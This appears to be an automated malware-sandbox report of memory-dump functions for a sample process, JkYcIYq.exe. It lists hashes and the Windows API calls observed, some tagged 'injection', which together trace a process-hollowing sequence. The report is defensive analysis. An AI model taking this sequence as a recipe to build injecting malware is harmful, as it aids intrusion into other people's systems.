Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444cd90bee7a4df3df4c76ee70a2c76c1dcbe4fba94aefbda05ddc91b5f916c7
Instruction ID: 85024db5c2da3453cb84bcea009a012082d68706f516c052995da6a0020df6c7
Opcode Fuzzy Hash: 444cd90bee7a4df3df4c76ee70a2c76c1dcbe4fba94aefbda05ddc91b5f916c7
Instruction Fuzzy Hash: 3FF08271E002089F8B50DFAA984099FBBF9FB98250B00453AD509D3311E670A9118BE2

Function 014646C9 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b75da026c1c1dfded05192c052eecb23d12c88f38971b61ad016621ff654bf
Instruction ID: 852afa2b8e4e2ffc6b7e041d91ea05f1c9601b68ab10e95b076542115050efb7
Opcode Fuzzy Hash: f5b75da026c1c1dfded05192c052eecb23d12c88f38971b61ad016621ff654bf
Instruction Fuzzy Hash: A1F09B31024302CFE7206F24F4AC3AA7BB5EB8B31BB086C56E41EC902ACB7504448B54

Function 014646D8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549bd022fdaf683a8a34fe4bb0d7addf6cd5e8d37868ca4f7951d770e3cbf3b9
Instruction ID: f31bd10e55c0f9708bd775654d0ba25dda04f32a77fbae5c77663799b9a98172
Opcode Fuzzy Hash: 549bd022fdaf683a8a34fe4bb0d7addf6cd5e8d37868ca4f7951d770e3cbf3b9
Instruction Fuzzy Hash: 5DE00975025307CBE6202B64F5AC2BE7ABAEB8B317B446D01E11EC903DCF7444548B99

Function 01461877 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72be390d70414c29c41aa9543d764d56774e5b923942cae7d2a8f05ed761d149
Instruction ID: b99f911fd600a12c92a4500b8528e7c341b05cd6142c1ee79e37b82404da4892
Opcode Fuzzy Hash: 72be390d70414c29c41aa9543d764d56774e5b923942cae7d2a8f05ed761d149
Instruction Fuzzy Hash: 83E0DF36D90326CFC701ABA0AC510EDB774AE81230B154A63C024B6190EB7816AECAA1

Function 01461888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f6c60b9d905df2beba81489222d577d40c72d4c19118df9e11bd22b755ca14
Instruction ID: c180e3a2f6d98dab60d299ce0d4ac4e97758c8ab9aea5d36d24cd10fd5bc3f28
Opcode Fuzzy Hash: 07f6c60b9d905df2beba81489222d577d40c72d4c19118df9e11bd22b755ca14
Instruction Fuzzy Hash: 56D01231D6022A978B00AAA5DC044EEBB38FED5221B514666D51437140EF702669C6E1

Function 01464831 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d23ad1731fd2ba759566a05ae7a3f99ecc1d961492f6735e1bde2a11e50ee5ac
Instruction ID: 0aee12f8ce65e6ca59f90322cc631fb5a28eed25235cdbd877a3d7904a88f8db
Opcode Fuzzy Hash: d23ad1731fd2ba759566a05ae7a3f99ecc1d961492f6735e1bde2a11e50ee5ac
Instruction Fuzzy Hash: 95C02B3104C3D04FCF2307B058310A67FF0ED8331470248CFD4818904FE1180908CB12

Analysis Process: JkYcIYq.exePID: 7840, Parent PID: 1124COMMON

Execution Graph

Execution Coverage:	12.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	175
Total number of Limit Nodes:	15

Executed Functions

Function 09257B18 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

?w=>, xrefs: 09257DE4

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID: ?w=>
API String ID: 0-1933253675
Opcode ID: 253236522dcd57f2ac6caaebe45815caddd4976b58824f11b2a7ee72316ff48e
Instruction ID: 5aaa8830261dce48f129468da5ce42961c365e612957ace2a76e9a2969310865
Opcode Fuzzy Hash: 253236522dcd57f2ac6caaebe45815caddd4976b58824f11b2a7ee72316ff48e
Instruction Fuzzy Hash: D4B116B0E55219DFDB18CFA6D98059EFBB6FF88340F10956AD426AB264DB349902CF10

Function 092557C0 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

5{, xrefs: 092559AA

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID: 5{
API String ID: 0-2291050889
Opcode ID: bcb382677e43ee60c49bdcd7f9f9ff89ec467a07b05f69bf6346755884bf6338
Instruction ID: d4cc5133276c5673d414979207b68c92b9e0526cd5b02c1cc1190d2a060adbec
Opcode Fuzzy Hash: bcb382677e43ee60c49bdcd7f9f9ff89ec467a07b05f69bf6346755884bf6338
Instruction Fuzzy Hash: F8A14EB4E11609DFCB04DFA9D5459AEBBB2FF89300F108469E816AB354DB349A41CFA1

Function 09257268 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

j4$y, xrefs: 0925747E

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID: j4$y
API String ID: 0-2391584009
Opcode ID: c8876225194d7fe9296f55f8de6fc160fc37f5b14e6be5bd68fbfeebf9d93617
Instruction ID: 7add5f7e2ba1e9464c258afb0abe74708d6c5c1f3fab15e6c39bd9aeb16aa9c3
Opcode Fuzzy Hash: c8876225194d7fe9296f55f8de6fc160fc37f5b14e6be5bd68fbfeebf9d93617
Instruction Fuzzy Hash: 7E812A70D55219EFCB08CFEAD98189EFBB6FF99350F10942AE816AB224D7749542CF40

Function 09250B70 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15308c1c27093ae1b1b0a8ef65e5b60d12cad4f054836334ff83cee5485c1de5
Instruction ID: 4a8a97091d9114a5d027a3175c837a8bf46298375d1e5303b9704370fee4ebc1
Opcode Fuzzy Hash: 15308c1c27093ae1b1b0a8ef65e5b60d12cad4f054836334ff83cee5485c1de5
Instruction Fuzzy Hash: 1581C1B4E112198FDB48CFE9C984AAEFBB2FF89301F14852AD81AAB354D7745905CB50

Function 09255C00 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470687a53acbb41ce697a0ecd3327d54765fb2a0c9fbe2a37cc4620553cad6db
Instruction ID: 23664d6ed954c1a8243b918dbda73885139d8e9ff88a15e25f20302a2b88ce55
Opcode Fuzzy Hash: 470687a53acbb41ce697a0ecd3327d54765fb2a0c9fbe2a37cc4620553cad6db
Instruction Fuzzy Hash: 90512BB4E11209DFCB08CFA9D9498AEFBB2FF99301F10952AE416E7254DB749601CF50

Function 092516E0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2cf2ee893c56613a4957c3bf375ea5b3ee9ed5fb941ebda12246bea95411a2d
Instruction ID: a6a3b2a04e9c2c40076b8fd180505e99b2630dd234606fc802431c3c07e0738f
Opcode Fuzzy Hash: c2cf2ee893c56613a4957c3bf375ea5b3ee9ed5fb941ebda12246bea95411a2d
Instruction Fuzzy Hash: 8A4149B0D142098FDB08CFAAD9846AEFBF2FF88301F14C06AD81AA7255D7348951CF94

Function 09252098 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d367140c85b085750763f1fde709c568bb649df3d3ec020caa2a81c9da775f92
Instruction ID: 7c334863e181ef0504b3cb4dd0257bbdcc02ff43b97d0179090c43ec25df9aa0
Opcode Fuzzy Hash: d367140c85b085750763f1fde709c568bb649df3d3ec020caa2a81c9da775f92
Instruction Fuzzy Hash: 0631F671E01618CBDB58CF6AD98469EBBB3AFC9311F14C0A9D409A6354DB355A91CF40

Function 09250040 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4fd5df6b8e398a1281097c0da832429f03b8dc644d2efa0a73cbeb7cfa36441
Instruction ID: a39c9c563bb137f5a241408c65340e7dc83fff1bc2d1d3ca9597ae4a225b587f
Opcode Fuzzy Hash: b4fd5df6b8e398a1281097c0da832429f03b8dc644d2efa0a73cbeb7cfa36441
Instruction Fuzzy Hash: 8E21A6B1E106189BEB58CFABD84479EFBF7AFC8200F04C1B6D90DA6224EB3419458F51

Function 02591D75 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02591FB6

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 14bc537b2fb86455e6f1e50106de1452e460c497f51bdd7e50172a4e77cadb92
Instruction ID: 1bf4e97e5f4516cd1d952308ed574636ac665f70f7149e99fca37a447919af09
Opcode Fuzzy Hash: 14bc537b2fb86455e6f1e50106de1452e460c497f51bdd7e50172a4e77cadb92
Instruction Fuzzy Hash: 32A15C71D00629DFEF24CF68C841BEDBBB2BF48314F1485A9E809A7280DB759985CF95

Function 02591D80 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02591FB6

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b953fcafab13d6abdc1440ca6a7c218188a0c2cd66aa9d49221a04dd41edbc22
Instruction ID: 5ce17f7076e644255b6c618d8255a211c1d473450ca28cc1fe162254df77cb87
Opcode Fuzzy Hash: b953fcafab13d6abdc1440ca6a7c218188a0c2cd66aa9d49221a04dd41edbc22
Instruction Fuzzy Hash: 44915C71D00629DFEF20CF68C841BEDBBB2BF48314F1485A9E809A7280DB759985CF95

Function 0266B16B Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 0266B221

Memory Dump Source

Source File: 00000009.00000002.1416951143.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2660000_JkYcIYq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6332a31f62399f70c5b71fb7600d87088601a6ccaf35e39c4ece714c1e0fc879
Instruction ID: 3320ae94ebd37f34ebc46a018e426e40e94ed8f2a7dc31172b1b3012fc71f98b
Opcode Fuzzy Hash: 6332a31f62399f70c5b71fb7600d87088601a6ccaf35e39c4ece714c1e0fc879
Instruction Fuzzy Hash: E541B2B0D00719CBEB24DFA9C9847DDBBF5BF49308F20846AD409AB251D7756946CF90

Function 02669D60 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 0266B221

Memory Dump Source

Source File: 00000009.00000002.1416951143.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2660000_JkYcIYq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3029578390c4544fb7b98e53a2c7592c4857eff44d5c16c5c78efa5e5b5de940
Instruction ID: 17f0405ea8de774acb0a3636840411ccf39e5f012d3c1be43b3fecdf50c2ee9a
Opcode Fuzzy Hash: 3029578390c4544fb7b98e53a2c7592c4857eff44d5c16c5c78efa5e5b5de940
Instruction Fuzzy Hash: 8941B2B0D00719CBEB24DFA9C9447ADBBF5BF45708F208069D409AB251D7756945CF90

Function 02591AF1 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02591B88

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: efab89f8d50f85326fc4887b9129895e20cb086b66828e01545b322f068a3875
Instruction ID: ddfb1aef872ce7cf0db3b3b70117ba86a57f24d02be8e9ce355708df870d7ed4
Opcode Fuzzy Hash: efab89f8d50f85326fc4887b9129895e20cb086b66828e01545b322f068a3875
Instruction Fuzzy Hash: DD2144B19003499FDF10CFA9C880BEEBBF2FF48314F108429E959A7250D7799985CBA4

Function 02591AF8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02591B88

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cb0a7e135f9486b1f093d55ddb07bcf3a6346e7c2af50a363576ded899e63281
Instruction ID: 3fbe09a2c033bb36ff2303c49963578973022d7f20c3557430a630029d7ffa61
Opcode Fuzzy Hash: cb0a7e135f9486b1f093d55ddb07bcf3a6346e7c2af50a363576ded899e63281
Instruction Fuzzy Hash: A82127B59003599FDF10CFAAC980BEEBBF5FF48314F148429E919A7240D7789980CBA4

Function 02591BE0 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02591C68

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4ea53e4bd760afcdb534790f1c23876ee7a5f87e2400a00732082a3154957776
Instruction ID: fc7b11cd82f2cab38496daed2fc7e4c1c2dbb7ba99bcc8a0174dd4f685467873
Opcode Fuzzy Hash: 4ea53e4bd760afcdb534790f1c23876ee7a5f87e2400a00732082a3154957776
Instruction Fuzzy Hash: 972125B19003599FDF10DFAAD980BEEBBF1FF48320F15842AE559A7640C7799941CBA0

Function 02591520 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 025915A6

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ce28bc086422ae330f46a8ae34658daf69ee851cdb8268df398b96be92faa716
Instruction ID: cd89cc6f0f48153d4aa8bb2371335499285fb4159a4ca633b045639e17a2ef37
Opcode Fuzzy Hash: ce28bc086422ae330f46a8ae34658daf69ee851cdb8268df398b96be92faa716
Instruction Fuzzy Hash: DC218771D003098FDB10DFAAC4807EEBBF4BF88324F15842AD459A7641D7789985CFA4

Function 02591BE8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02591C68

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 44ce5b73f95f1583ef95aae186f3d7ca5ca81422478f03c1d0ae5ac73a815b34
Instruction ID: 530f769b84c7eb518c2932e0cf7d10c635a27f4c6efa02500822e616a514c8ce
Opcode Fuzzy Hash: 44ce5b73f95f1583ef95aae186f3d7ca5ca81422478f03c1d0ae5ac73a815b34
Instruction Fuzzy Hash: 3E2114B19003599FDB10DFAAC980BEEBBF5FF48310F14842AE519A7240D7799940CBA4

Function 02591528 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 025915A6

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 61e10b1625f943a97e863a28fea922289378eb68073c8cf6cd61c9a5aa0cf24f
Instruction ID: 40143470aab32159a9e522de2d063dc85c321fecfc767d7f96fd0a31c441fe8a
Opcode Fuzzy Hash: 61e10b1625f943a97e863a28fea922289378eb68073c8cf6cd61c9a5aa0cf24f
Instruction Fuzzy Hash: D8213875D003098FDB10DFAAC4847EEBBF4BF48214F558429D419A7240D7789984CFA4

Function 02591A31 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02591AA6

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6ed480b02fa4cddc9beea633c9538e420bab392c1b6140d0bf1bf1c07897a1ef
Instruction ID: 6cc18abb6da61bcbd40654c2350bd68082ea91bce03bb339019c56cfe6d0251c
Opcode Fuzzy Hash: 6ed480b02fa4cddc9beea633c9538e420bab392c1b6140d0bf1bf1c07897a1ef
Instruction Fuzzy Hash: 552167758002499FDF10DFAAC880BEFBBF5BF88320F148419D419A7250C7759980CFA0

Function 02591A38 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02591AA6

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2c8c7da8e5b172d7ea658bc47e44f2c912f88b525486aed253f35e58c568fb37
Instruction ID: 7349f95826cdb95389da311178413452dc529a26a5692d91241030e4ca658513
Opcode Fuzzy Hash: 2c8c7da8e5b172d7ea658bc47e44f2c912f88b525486aed253f35e58c568fb37
Instruction Fuzzy Hash: F91126759003499FDF10DFAAC844BDEBBF5BF88320F148419E519A7650C7799980CBA4

Function 02591470 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 025914DA

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cf4a0c6a132b735d4d6f2ce516cafb2b8e28e0c50b15dd6bd4a3d93c18b290af
Instruction ID: c60ae0a2bca6b12da52c93343e08c4ec87b04fe2bdf5d98b85a6743740da7d9c
Opcode Fuzzy Hash: cf4a0c6a132b735d4d6f2ce516cafb2b8e28e0c50b15dd6bd4a3d93c18b290af
Instruction Fuzzy Hash: A6118BB59003488FDB10DFAAC4447DFFBF5EF88224F148819C459A7740C775A481CB94

Function 02595511 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 02595575

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3b43cce3e4262d493e3ec2bd175c5b7411fa44c6818279801ca111ddf69936e1
Instruction ID: c214dddbd35a164e9722fd4ad4c273a3a44cc179312d1a98b8089e1a1fa5fa09
Opcode Fuzzy Hash: 3b43cce3e4262d493e3ec2bd175c5b7411fa44c6818279801ca111ddf69936e1
Instruction Fuzzy Hash: B01123B28002889FDB21CFA9D485BEEBFF4FB48324F14845AD458A7211D375A984CFA4

Function 02591478 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 025914DA

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: abbc671821874e65ee51980070c9bc8f7e98291517e60b53a61ee88cd68146ee
Instruction ID: 3b55e051f9da5d1acdcbed34d468601cf715b642d56c13f25031ecc493bf7a31
Opcode Fuzzy Hash: abbc671821874e65ee51980070c9bc8f7e98291517e60b53a61ee88cd68146ee
Instruction Fuzzy Hash: 591136B59003498FDB10DFAAC4447EEFBF5AF88624F248429D519A7740CB79A980CBA4

Function 025903B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 02595575

Memory Dump Source

Source File: 00000009.00000002.1416802860.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2590000_JkYcIYq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1f79a13bacb2d700ac04e165302d581c32bdee8d0d7e7373a584343de8108199
Instruction ID: 647fc53822c8e7ef69fc3e6f655e51ee6292b7b7d4d2f20bfe71643caf2b3a78
Opcode Fuzzy Hash: 1f79a13bacb2d700ac04e165302d581c32bdee8d0d7e7373a584343de8108199
Instruction Fuzzy Hash: 141122B5800348DFDB10CF9AC884BEEBBF8FB48324F108419E518A7211D375A980CFA5

Function 0925B04C Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

D, xrefs: 0925B0FD

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: de68b1d4e1631c7b2e37f7f612f1d0aedb3a236e0dee68e561cc6326f9b7e41a
Instruction ID: e80d879e78f9c720994ef80c6089794973c14fe639e47cc1e02c2d2a6b234e29
Opcode Fuzzy Hash: de68b1d4e1631c7b2e37f7f612f1d0aedb3a236e0dee68e561cc6326f9b7e41a
Instruction Fuzzy Hash: 4251AF74D28288CFDB04CFA6D8542FDBBF5AF8A310F14902AD81AEB291D7705941CF50

Function 0925E77D Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

^,, xrefs: 0925E7FD

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID: ^,
API String ID: 0-1448041649
Opcode ID: 669998ec328040cea8af5555d9429f52d30483b825f219a857abd69711a41142
Instruction ID: eeac414bd56d703eee00e73b90a708bd3e3a6bf0499de4b8a37de04ed731e6e2
Opcode Fuzzy Hash: 669998ec328040cea8af5555d9429f52d30483b825f219a857abd69711a41142
Instruction Fuzzy Hash: 43419F70950219DFEB18DF64D944BAAB7BAFB84200F1095E6D80EDB308DB709E85CF05

Function 09251888 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

OijW, xrefs: 09251931

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID: OijW
API String ID: 0-3475513506
Opcode ID: 345f732f9d59b80b0e577031db3b426a03028fbd86aec408acced393703b7474
Instruction ID: c956b60e5fda40bb2c90e6d4000cdb30277948cac8c2bd81cafaf20b7088dbfe
Opcode Fuzzy Hash: 345f732f9d59b80b0e577031db3b426a03028fbd86aec408acced393703b7474
Instruction Fuzzy Hash: 4231F6B4E1421ADFDB44CFA9C481AAEFBF2BF88340F10946AC819A7315D7749A11CF91

Function 09253598 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

?H,a, xrefs: 092535CF

Memory Dump Source

Source File: 00000009.00000002.1423304810.0000000009250000.00000040.00000800.00020000.00000000.sdmp, Offset: 09250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9250000_JkYcIYq.jbxd

Similarity

API ID:
String ID: ?H,a
API String ID: 0-4093759987
Opcode ID: 3433e11624a5d27395c23519b2d7be2ffad66e9094c08bb9c65a193c1f04eba7
Instruction ID: 4d1d855c919991cab42fb0b362414f6baab61e344ae3be0d86424afe0967bf5e
